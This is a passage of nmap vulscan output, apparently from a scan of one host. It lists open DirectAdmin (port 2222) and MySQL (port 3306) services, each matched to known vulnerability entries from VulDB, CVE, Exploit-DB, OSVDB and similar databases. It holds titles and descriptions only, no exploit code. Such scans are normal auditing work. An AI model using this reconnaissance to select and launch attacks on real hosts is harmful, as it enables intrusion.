17584| [25607] DirectAdmin CMD_BANDWIDTH_BREAKDOWN Cross-Site Scripting Vulnerability
17585| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
17586| [24688] DirectAdmin Domain Parameter Cross-Site Scripting Vulnerability
17587| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
17588| [23254] DirectAdmin Logfile HTML Injection Vulnerability
17589| [22996] DirectAdmin CMD_USER_STATS Cross-Site Scripting Vulnerability
17590| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
17591| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
17592| [21049] DirectAdmin Multiple Cross-Site Scripting Vulnerabilities
17593| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
17594| [17961] Dovecot Remote Information Disclosure Vulnerability
17595| [16672] Dovecot Double Free Denial of Service Vulnerability
17596| [8495] akpop3d User Name SQL Injection Vulnerability
17597| [8473] Vpop3d Remote Denial Of Service Vulnerability
17598| [3990] ZPop3D Bad Login Logging Failure Vulnerability
17599| [2781] DynFX MailServer POP3d Denial of Service Vulnerability
17600|
17601| IBM X-Force - https://exchange.xforce.ibmcloud.com:
17602| [86382] Dovecot POP3 Service denial of service
17603| [85490] DirectAdmin Backup System email account functionality symlink
17604| [85488] DirectAdmin Backup System symlink
17605| [84396] Dovecot IMAP APPEND denial of service
17606| [80453] Dovecot mail-search.c denial of service
17607| [74569] DirectAdmin CMD_DOMAIN cross-site scripting
17608| [72685] DirectAdmin domain parameter cross-site request forgery
17609| [71354] Dovecot SSL Common Name (CN) weak security
17610| [67675] Dovecot script-login security bypass
17611| [67674] Dovecot script-login directory traversal
17612| [67589] Dovecot header name denial of service
17613| [67254] DirectAdmin MySQL information disclosure
17614| [67253] DirectAdmin hard link privilege escalation
17615| [63267] Apple Mac OS X Dovecot information disclosure
17616| [62340] Dovecot mailbox security bypass
17617| [62339] Dovecot IMAP or POP3 denial of service
17618| [62256] Dovecot mailbox security bypass
17619| [62255] Dovecot ACL entry security bypass
17620| [60639] Dovecot ACL plugin weak security
17621| [57267] Apple Mac OS X Dovecot Kerberos security bypass
17622| [56875] DirectAdmin name cross-site scripting
17623| [56763] Dovecot header denial of service
17624| [55181] DirectAdmin account cross-site request forgery
17625| [54363] Dovecot base_dir privilege escalation
17626| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
17627| [51292] DirectAdmin CMD_REDIRECT cross-site scripting
17628| [50167] DirectAdmin CMD_DB command execution
17629| [49416] DirectAdmin CMD_DB backup action symlink
17630| [46323] Dovecot dovecot.conf information disclosure
17631| [46227] Dovecot message parsing denial of service
17632| [45669] Dovecot ACL mailbox security bypass
17633| [45667] Dovecot ACL plugin rights security bypass
17634| [41085] Dovecot TAB characters authentication bypass
17635| [41009] Dovecot mail_extra_groups option unauthorized access
17636| [39342] Dovecot LDAP auth cache configuration security bypass
17637| [36510] DirectAdmin user parameter cross-site scripting
17638| [35767] Dovecot ACL plugin security bypass
17639| [35177] DirectAdmin domain parameter cross-site scripting
17640| [34082] Dovecot mbox-storage.c directory traversal
17641| [33390] DirectAdmin log file cross-site scripting
17642| [33023] DirectAdmin CMD_USER_STATS form cross-site scripting
17643| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
17644| [30256] DirectAdmin user, TYPE, and name parameters cross-site scripting
17645| [26578] Cyrus IMAP pop3d buffer overflow
17646| [26536] Dovecot IMAP LIST information disclosure
17647| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
17648| [24709] Dovecot APPEND command denial of service
17649| [13018] akpop3d authentication code SQL injection
17650| [7345] Slackware Linux imapd and ipop3d core dump
17651| [6269] imap, ipop2d and ipop3d buffer overflows
17652| [5923] Linuxconf vpop3d symbolic link
17653| [4918] IPOP3D, Buffer overflow attack
17654| [1560] IPOP3D, user login successful
17655| [1559] IPOP3D user login to remote host successful
17656| [1525] IPOP3D, user logout
17657| [1524] IPOP3D, user auto-logout
17658| [1523] IPOP3D, user login failure
17659| [1522] IPOP3D, brute force attack
17660| [1521] IPOP3D, user kiss of death logout
17661| [418] pop3d mktemp creates insecure temporary files
17662|
17663| Exploit-DB - https://www.exploit-db.com:
17664| [29747] DirectAdmin 1.292 CMD_USER_STATS Cross-Site Scripting Vulnerability
17665| [29006] DirectAdmin 1.28/1.29 CMD_FTP_SHOW DOMAIN Parameter XSS
17666| [29005] DirectAdmin 1.28/1.29 CMD_EMAIL_LIST name Parameter XSS
17667| [29004] DirectAdmin 1.28/1.29 CMD_EMAIL_VACATION_MODIFY user Parameter XSS
17668| [29003] DirectAdmin 1.28/1.29 CMD_TICKET type Parameter XSS
17669| [29002] DirectAdmin 1.28/1.29 CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
17670| [29001] DirectAdmin 1.28/1.29 CMD_TICKET_CREATE TYPE Parameter XSS
17671| [29000] DirectAdmin 1.28/1.29 CMD_SHOW_USER user Parameter XSS
17672| [28999] DirectAdmin 1.28/1.29 CMD_SHOW_RESELLER user Parameter XSS
17673| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
17674| [23053] Vpop3d Remote Denial of Service Vulnerability
17675| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
17676| [11893] tPop3d 1.5.3 DoS
17677| [11813] DirectAdmin 1.34.4 - Multi CSRF vulnerability
17678| [11029] DirectAdmin <= 1.33.6 Symlink Permission Bypass
17679| [10779] DirectAdmin 1.34.0 - CSRF Create Administrator Vulnerability
17680| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
17681| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
17682| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
17683| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
17684|
17685| OpenVAS (Nessus) - http://www.openvas.org:
17686| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
17687| [901025] Dovecot Version Detection
17688| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
17689| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
17690| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
17691| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
17692| [870607] RedHat Update for dovecot RHSA-2011:0600-01
17693| [870471] RedHat Update for dovecot RHSA-2011:1187-01
17694| [870153] RedHat Update for dovecot RHSA-2008:0297-02
17695| [863272] Fedora Update for dovecot FEDORA-2011-7612
17696| [863115] Fedora Update for dovecot FEDORA-2011-7258
17697| [861525] Fedora Update for dovecot FEDORA-2007-664
17698| [861394] Fedora Update for dovecot FEDORA-2007-493
17699| [861333] Fedora Update for dovecot FEDORA-2007-1485
17700| [860845] Fedora Update for dovecot FEDORA-2008-9202
17701| [860663] Fedora Update for dovecot FEDORA-2008-2475
17702| [860169] Fedora Update for dovecot FEDORA-2008-2464
17703| [860089] Fedora Update for dovecot FEDORA-2008-9232
17704| [840950] Ubuntu Update for dovecot USN-1295-1
17705| [840668] Ubuntu Update for dovecot USN-1143-1
17706| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
17707| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
17708| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
17709| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
17710| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
17711| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
17712| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
17713| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
17714| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
17715| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
17716| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
17717| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
17718| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
17719| [70259] FreeBSD Ports: dovecot
17720| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
17721| [66522] FreeBSD Ports: dovecot
17722| [65010] Ubuntu USN-838-1 (dovecot)
17723| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
17724| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
17725| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
17726| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
17727| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
17728| [62854] FreeBSD Ports: dovecot-managesieve
17729| [61916] FreeBSD Ports: dovecot
17730| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
17731| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
17732| [60528] FreeBSD Ports: dovecot
17733| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
17734| [60089] FreeBSD Ports: dovecot
17735| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
17736| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
17737|
17738| SecurityTracker - https://www.securitytracker.com:
17739| [1028744] DirectAdmin Backup System Flaws Let Local Users Gain Elevated Privileges
17740| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
17741| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
17742| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
17743|
17744| OSVDB - http://www.osvdb.org:
17745| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
17746| [94899] DirectAdmin Backup System Unspecified Email Account Function Symlink Local Privilege Escalation
17747| [94898] DirectAdmin Backup System Unspecified Symlink Arbitrary File Manipulation Local Privilege Escalation
17748| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
17749| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
17750| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
17751| [80919] DirectAdmin CMD_DOMAIN Multiple Parameter XSS
17752| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
17753| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
17754| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
17755| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
17756| [72120] DirectAdmin mysql_backups Folder MySQL Database Backup Local Disclosure
17757| [72119] DirectAdmin Backup Creation Hard Link Check Weakness Local Privilege Escalation
17758| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
17759| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
17760| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
17761| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
17762| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
17763| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
17764| [66113] Dovecot Mail Root Directory Creation Permission Weakness
17765| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
17766| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
17767| [66110] Dovecot Multiple Unspecified Buffer Overflows
17768| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
17769| [64783] Dovecot E-mail Message Header Unspecified DoS
17770| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
17771| [62914] DirectAdmin CMD_DB_VIEW name Parameter XSS
17772| [62796] Dovecot mbox Format Email Header Handling DoS
17773| [61395] DirectAdmin Admin Account Creation CSRF
17774| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
17775| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
17776| [55296] DirectAdmin CMD_REDIRECT URL Parameter XSS
17777| [54015] DirectAdmin CMD_DB name Parameter Shell Metacharacter Arbitrary Command Execution
17778| [54014] DirectAdmin CMD_DB Database Backup Request Temporary File Symlink Arbitrary File Overwrite
17779| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
17780| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
17781| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
17782| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
17783| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
17784| [43137] Dovecot mail_extra_groups Symlink File Manipulation
17785| [42979] Dovecot passdbs Argument Injection Authentication Bypass
17786| [39876] Dovecot LDAP Auth Cache Security Bypass
17787| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
17788| [36999] DirectAdmin CMD_BANDWIDTH_BREAKDOWN user Parameter XSS
17789| [36339] DirectAdmin CMD_USER_STATS domain Parameter XSS
17790| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
17791| [34687] DirectAdmin http/ftp XSS Log Viewer Data Injection
17792| [34273] DirectAdmin CMD_USER_STATS RESULT Parameter XSS
17793| [32676] DirectAdmin CMD_FTP_SHOW DOMAIN Parameter XSS
17794| [32675] DirectAdmin CMD_EMAIL_LIST name Parameter XSS
17795| [32674] DirectAdmin CMD_EMAIL_VACATION_MODIFY user Parameter XSS
17796| [32673] DirectAdmin CMD_TICKET type Parameter XSS
17797| [32672] DirectAdmin CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
17798| [32671] DirectAdmin CMD_TICKET_CREATE TYPE Parameter XSS
17799| [32670] DirectAdmin CMD_SHOW_USER user Parameter XSS
17800| [32669] DirectAdmin CMD_SHOW_RESELLER user Parameter XSS
17801| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
17802| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
17803| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
17804| [25138] DirectAdmin HTM_PASSWD domain Parameter XSS
17805| [23281] Dovecot imap/pop3-login dovecot-auth DoS
17806| [23280] Dovecot Malformed APPEND Command DoS
17807| [14459] mmmail mmpop3d USER Command mmsyslog Function Format String
17808| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
17809| [5857] Linux pop3d Arbitrary Mail File Access
17810| [2471] akpop3d username SQL Injection
17811|_
178122222/tcp open http DirectAdmin httpd 1.57.1 (Registered to Your Domain Goes Here, LLP)
17813|_http-trane-info: Problem with XML parsing of /evox/about
17814| vulscan: VulDB - https://vuldb.com:
17815| [134243] InfinitumIT DirectAdmin up to 1.561 FileManager CSRF privilege escalation
17816| [131477] JBMC DirectAdmin 1.55 /CMD_ACCOUNT_ADMIN cross site request forgery
17817| [112266] JBMC DirectAdmin up to 1.51 email_ftp_password_change Setting memory corruption
17818| [95172] Directadmin Controlpanel 1.50.1 /CMD_SELECT_USERS cross site scripting
17819| [95100] DirectAdmin up to 1.50.1 Crash denial of service
17820| [62578] DirectAdmin 1.403 cross site scripting
17821| [61198] Jbmc-software DirectAdmin 1.403 cross site scripting
17822| [48756] Jbmc-software DirectAdmin up to 1.292 cross site scripting
17823| [48060] Jbmc-software DirectAdmin up to 1.17 privilege escalation
17824| [38747] DirectAdmin 1.30.2 cross site scripting
17825| [37578] DirectAdmin 1.30.1 cross site scripting
17826| [36066] JBMC Software DirectAdmin 1.293 cross site scripting
17827| [35680] Jbmc Software DirectAdmin 1.293 cross site scripting
17828| [33341] JBMC Software DirectAdmin 1.28.1 cross site scripting
17829|
17830| MITRE CVE - https://cve.mitre.org:
17831| [CVE-2012-5305] Cross-site scripting (XSS) vulnerability in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
17832| [CVE-2012-3842] Multiple cross-site scripting (XSS) vulnerabilities in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via the (1) select0 or (2) select8 parameters.
17833| [CVE-2009-2216] Cross-site scripting (XSS) vulnerability in CMD_REDIRECT in DirectAdmin 1.33.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the URI in a view=advanced request.
17834| [CVE-2009-1526] JBMC Software DirectAdmin before 1.334 allows local users to create or overwrite any file via a symlink attack on an arbitrary file in a certain temporary directory, related to a request for this temporary file in the PATH_INFO to the CMD_DB script during a backup action.
17835| [CVE-2009-1525] CMD_DB in JBMC Software DirectAdmin before 1.334 allows remote authenticated users to gain privileges via shell metacharacters in the name parameter during a restore action.
17836| [CVE-2007-4830] Cross-site scripting (XSS) vulnerability in CMD_BANDWIDTH_BREAKDOWN in DirectAdmin 1.30.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the user parameter.
17837| [CVE-2007-3501] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin 1.30.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the domain parameter, a different vector than CVE-2007-1508.
17838| [CVE-2007-1926] Cross-site scripting (XSS) vulnerability in JBMC Software DirectAdmin before 1.293 does not properly display log files, which allows remote authenticated users to inject arbitrary web script or HTML via (1) http or (2) ftp requests logged in /var/log/directadmin/security.log
17839| [CVE-2006-5983] Multiple cross-site scripting (XSS) vulnerabilities in JBMC Software DirectAdmin 1.28.1 allow remote authenticated users to inject arbitrary web script or HTML via the (1) user parameter to (a) CMD_SHOW_RESELLER or (b) CMD_SHOW_USER in the Admin level
17840|
17841| SecurityFocus - https://www.securityfocus.com/bid/:
17842| [83952] DirectAdmin CVE-2006-2153 Cross-Site Scripting Vulnerability
17843| [63911] Installatron Plugin for DirectAdmin Insecure Temporary File Creation Vulnerability
17844| [63373] Installatron Plugin for DirectAdmin cURL Output Remote Privilege Escalation Vulnerability
17845| [62929] DirectAdmin Backup Multiple Security Vulnerabilities
17846| [61017] DirectAdmin Symlink Attack Multiple Remote Privilege Escalation Vulnerabilities
17847| [53281] DirectAdmin Multiple Cross Site Scripting Vulnerabilities
17848| [52848] RETIRED: DirectAdmin 'CMD_DOMAIN' Cross-Site Scripting Vulnerability
17849| [52845] JBMC Software DirectAdmin 'domain' Parameter Cross Site Scripting Vulnerability
17850| [47693] DirectAdmin 'mysql_backup' Folder Permissions Information Disclosure Vulnerability
17851| [47690] DirectAdmin Hard Link Local Privilege Escalation Vulnerability
17852| [38721] DirectAdmin 'CMD_DB_VIEW' Cross-Site Scripting Vulnerability
17853| [35450] DirectAdmin 'CMD_REDIRECT' Cross-Site Scripting Vulnerability
17854| [34678] DirectAdmin '/CMD_DB' Restore Action Local Privilege Escalation Vulnerability
17855| [34676] DirectAdmin '/CMD_DB' Backup Action Insecure Temporary File Creation Vulnerability
17856| [25607] DirectAdmin CMD_BANDWIDTH_BREAKDOWN Cross-Site Scripting Vulnerability
17857| [24688] DirectAdmin Domain Parameter Cross-Site Scripting Vulnerability
17858| [23254] DirectAdmin Logfile HTML Injection Vulnerability
17859| [22996] DirectAdmin CMD_USER_STATS Cross-Site Scripting Vulnerability
17860| [21049] DirectAdmin Multiple Cross-Site Scripting Vulnerabilities
17861|
17862| IBM X-Force - https://exchange.xforce.ibmcloud.com:
17863| [85490] DirectAdmin Backup System email account functionality symlink
17864| [85488] DirectAdmin Backup System symlink
17865| [74569] DirectAdmin CMD_DOMAIN cross-site scripting
17866| [72685] DirectAdmin domain parameter cross-site request forgery
17867| [67254] DirectAdmin MySQL information disclosure
17868| [67253] DirectAdmin hard link privilege escalation
17869| [56875] DirectAdmin name cross-site scripting
17870| [55181] DirectAdmin account cross-site request forgery
17871| [51292] DirectAdmin CMD_REDIRECT cross-site scripting
17872| [50167] DirectAdmin CMD_DB command execution
17873| [49416] DirectAdmin CMD_DB backup action symlink
17874| [36510] DirectAdmin user parameter cross-site scripting
17875| [35177] DirectAdmin domain parameter cross-site scripting
17876| [33390] DirectAdmin log file cross-site scripting
17877| [33023] DirectAdmin CMD_USER_STATS form cross-site scripting
17878| [30256] DirectAdmin user, TYPE, and name parameters cross-site scripting
17879|
17880| Exploit-DB - https://www.exploit-db.com:
17881| [29747] DirectAdmin 1.292 CMD_USER_STATS Cross-Site Scripting Vulnerability
17882| [29006] DirectAdmin 1.28/1.29 CMD_FTP_SHOW DOMAIN Parameter XSS
17883| [29005] DirectAdmin 1.28/1.29 CMD_EMAIL_LIST name Parameter XSS
17884| [29004] DirectAdmin 1.28/1.29 CMD_EMAIL_VACATION_MODIFY user Parameter XSS
17885| [29003] DirectAdmin 1.28/1.29 CMD_TICKET type Parameter XSS
17886| [29002] DirectAdmin 1.28/1.29 CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
17887| [29001] DirectAdmin 1.28/1.29 CMD_TICKET_CREATE TYPE Parameter XSS
17888| [29000] DirectAdmin 1.28/1.29 CMD_SHOW_USER user Parameter XSS
17889| [28999] DirectAdmin 1.28/1.29 CMD_SHOW_RESELLER user Parameter XSS
17890| [11813] DirectAdmin 1.34.4 - Multi CSRF vulnerability
17891| [11029] DirectAdmin <= 1.33.6 Symlink Permission Bypass
17892| [10779] DirectAdmin 1.34.0 - CSRF Create Administrator Vulnerability
17893|
17894| OpenVAS (Nessus) - http://www.openvas.org:
17895| No findings
17896|
17897| SecurityTracker - https://www.securitytracker.com:
17898| [1028744] DirectAdmin Backup System Flaws Let Local Users Gain Elevated Privileges
17899|
17900| OSVDB - http://www.osvdb.org:
17901| [94899] DirectAdmin Backup System Unspecified Email Account Function Symlink Local Privilege Escalation
17902| [94898] DirectAdmin Backup System Unspecified Symlink Arbitrary File Manipulation Local Privilege Escalation
17903| [80919] DirectAdmin CMD_DOMAIN Multiple Parameter XSS
17904| [72120] DirectAdmin mysql_backups Folder MySQL Database Backup Local Disclosure
17905| [72119] DirectAdmin Backup Creation Hard Link Check Weakness Local Privilege Escalation
17906| [62914] DirectAdmin CMD_DB_VIEW name Parameter XSS
17907| [61395] DirectAdmin Admin Account Creation CSRF
17908| [55296] DirectAdmin CMD_REDIRECT URL Parameter XSS
17909| [54015] DirectAdmin CMD_DB name Parameter Shell Metacharacter Arbitrary Command Execution
17910| [54014] DirectAdmin CMD_DB Database Backup Request Temporary File Symlink Arbitrary File Overwrite
17911| [36999] DirectAdmin CMD_BANDWIDTH_BREAKDOWN user Parameter XSS
17912| [36339] DirectAdmin CMD_USER_STATS domain Parameter XSS
17913| [34687] DirectAdmin http/ftp XSS Log Viewer Data Injection
17914| [34273] DirectAdmin CMD_USER_STATS RESULT Parameter XSS
17915| [32676] DirectAdmin CMD_FTP_SHOW DOMAIN Parameter XSS
17916| [32675] DirectAdmin CMD_EMAIL_LIST name Parameter XSS
17917| [32674] DirectAdmin CMD_EMAIL_VACATION_MODIFY user Parameter XSS
17918| [32673] DirectAdmin CMD_TICKET type Parameter XSS
17919| [32672] DirectAdmin CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
17920| [32671] DirectAdmin CMD_TICKET_CREATE TYPE Parameter XSS
17921| [32670] DirectAdmin CMD_SHOW_USER user Parameter XSS
17922| [32669] DirectAdmin CMD_SHOW_RESELLER user Parameter XSS
17923| [25138] DirectAdmin HTM_PASSWD domain Parameter XSS
17924|_
179253306/tcp open mysql MySQL (unauthorized)
17926| vulscan: VulDB - https://vuldb.com:
17927| [141414] LibreNMS up to 1.47 inventory.inc.php mysqli_escape_real_string Parameter cross site scripting
17928| [140101] Yandex ClickHouse MySQL Client information disclosure
17929| [139468] cPanel up to 60.0.24 MySQL Upgrade File privilege escalation
17930| [139350] cPanel up to 64.0.20 convert_roundcube_mysql2sqlite privilege escalation
17931| [139349] cPanel up to 64.0.20 convert_roundcube_mysql2sqlite privilege escalation
17932| [139308] cPanel up to 67.9999.102 WHM MySQL Password Change Interfaces Stored cross site scripting
17933| [138305] SaltStack Salt 2018.3/2019.2 mysqluser_chpass sql injection
17934| [138102] Oracle MySQL Server up to 8.0.16 InnoDB unknown vulnerability
17935| [138101] Oracle MySQL Server up to 8.0.16 Privileges unknown vulnerability
17936| [138100] Oracle MySQL Server up to 5.6.44/5.7.18 Privileges unknown vulnerability
17937| [138099] Oracle MySQL Server up to 5.6.44/5.7.26/8.0.16 Compiling information disclosure
17938| [138098] Oracle MySQL Server up to 5.7.26/8.0.16 Audit Plug-in unknown vulnerability
17939| [138097] Oracle MySQL Server up to 5.7.26/8.0.16 Client programs denial of service
17940| [138096] Oracle MySQL Server up to 8.0.16 Roles denial of service
17941| [138095] Oracle MySQL Server up to 8.0.16 Privileges denial of service
17942| [138094] Oracle MySQL Server up to 5.7.25/8.0.15 Replication denial of service
17943| [138093] Oracle MySQL Server up to 8.0.16 Options denial of service
17944| [138092] Oracle MySQL Server up to 8.0.16 Optimizer denial of service
17945| [138091] Oracle MySQL Server up to 8.0.16 Optimizer denial of service
17946| [138090] Oracle MySQL Server up to 8.0.16 Optimizer denial of service
17947| [138089] Oracle MySQL Server up to 8.0.16 Optimizer denial of service
17948| [138088] Oracle MySQL Server up to 8.0.16 Optimizer denial of service
17949| [138087] Oracle MySQL Server up to 8.0.16 Optimizer denial of service
17950| [138086] Oracle MySQL Server up to 8.0.16 Optimizer denial of service
17951| [138085] Oracle MySQL Server up to 5.7.26/8.0.16 Optimizer denial of service
17952| [138084] Oracle MySQL Server up to 5.7.26/8.0.16 Optimizer denial of service
17953| [138083] Oracle MySQL Server up to 8.0.12 GIS denial of service
17954| [138082] Oracle MySQL Server up to 8.0.16 FTS denial of service
17955| [138081] Oracle MySQL Server up to 8.0.16 DML denial of service
17956| [138080] Oracle MySQL Server up to 8.0.16 Components denial of service
17957| [138079] Oracle MySQL Server up to 5.6.44/5.7.26/8.0.16 Pluggable Auth denial of service
17958| [138078] Oracle MySQL Server up to 8.0.16 InnoDB denial of service
17959| [138077] Oracle MySQL Server up to 8.0.15 InnoDB denial of service
17960| [138076] Oracle MySQL Server up to 8.0.16 InnoDB denial of service
17961| [138074] Oracle MySQL Server up to 8.0.12 Roles denial of service
17962| [138073] Oracle MySQL Server up to 5.7.26/8.0.16 Audit Log denial of service
17963| [138072] Oracle MySQL Server up to 5.7.26/8.0.16 Privileges unknown vulnerability
17964| [138071] Oracle MySQL Server up to 5.7.23 Replication unknown vulnerability
17965| [138070] Oracle MySQL Server up to 5.6.44/5.7.26/8.0.16 Audit unknown vulnerability
17966| [138069] Oracle MySQL Server up to 5.7.26/8.0.16 InnoDB unknown vulnerability
17967| [138068] Oracle MySQL Workbench up to 8.0.16 OpenSSL information disclosure
17968| [138067] Oracle MySQL Server up to 5.6.44/5.7.26/8.0.16 XML denial of service
17969| [138066] Oracle MySQL Server up to 5.6.44/5.7.26/8.0.16 Parser denial of service
17970| [138065] Oracle MySQL Server up to 8.0.16 Optimizer denial of service
17971| [138064] Oracle MySQL Server up to 8.0.16 Optimizer denial of service
17972| [138063] Oracle MySQL Server up to 8.0.12 Data Dictionary denial of service
17973| [138062] Oracle MySQL Server up to 8.0.16 Charsets denial of service
17974| [138061] Oracle MySQL Server up to 8.0.16 Replication unknown vulnerability
17975| [138060] Oracle MySQL Server up to 8.0.16 InnoDB Cluster unknown vulnerability
17976| [138059] Oracle MySQL Enterprise Monitor up to 4.0.9/8.0.14 Spring Framework denial of service
17977| [138058] Oracle MySQL Server up to 5.7.26/8.0.15 cURL unknown vulnerability
17978| [133701] Oracle MySQL Server up to 8.0.15 Replication denial of service
17979| [133700] Oracle MySQL Server up to 8.0.15 Replication denial of service
17980| [133698] Oracle MySQL Server up to 8.0.15 Group Replication Plugin denial of service
17981| [133697] Oracle MySQL Server up to 8.0.15 Roles denial of service
17982| [133695] Oracle MySQL Server up to 8.0.15 Privileges denial of service
17983| [133691] Oracle MySQL Server up to 8.0.15 Replication denial of service
17984| [133687] Oracle MySQL Server up to 8.0.15 Optimizer denial of service
17985| [133686] Oracle MySQL Server up to 8.0.15 Optimizer denial of service
17986| [133685] Oracle MySQL Server up to 8.0.15 Optimizer denial of service
17987| [133684] Oracle MySQL Server up to 8.0.15 Optimizer denial of service
17988| [133683] Oracle MySQL Server up to 8.0.15 Optimizer denial of service
17989| [133682] Oracle MySQL Server up to 8.0.15 Optimizer denial of service
17990| [133681] Oracle MySQL Server up to 8.0.15 Optimizer denial of service
17991| [133680] Oracle MySQL Server up to 8.0.15 Optimizer denial of service
17992| [133677] Oracle MySQL Server up to 8.0.15 Information Schema denial of service
17993| [133676] Oracle MySQL Server up to 8.0.15 DDL denial of service
17994| [133675] Oracle MySQL Server up to 8.0.15 DDL denial of service
17995| [133672] Oracle MySQL Server up to 8.0.15 InnoDB denial of service
17996| [133668] Oracle MySQL Server up to 8.0.15 Replication denial of service
17997| [133666] Oracle MySQL Server up to 8.0.15 Options denial of service
17998| [133662] Oracle MySQL Connectors up to 8.0.15 Connector/J unknown vulnerability
17999| [133661] Oracle MySQL Server up to 8.0.15 Optimizer denial of service
18000| [133660] Oracle MySQL Server up to 8.0.15 Optimizer denial of service
18001| [133659] Oracle MySQL Server up to 8.0.15 Optimizer denial of service
18002| [129647] Oracle MySQL Server up to 5.7.24/8.0.13 Privileges denial of service
18003| [129646] Oracle MySQL Server up to 5.7.24/8.0.13 Privileges denial of service
18004| [129645] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 Replication denial of service
18005| [129644] Oracle MySQL Server up to 5.7.24/8.0.13 Partition denial of service
18006| [129643] Oracle MySQL Server up to 8.0.13 Optimizer denial of service
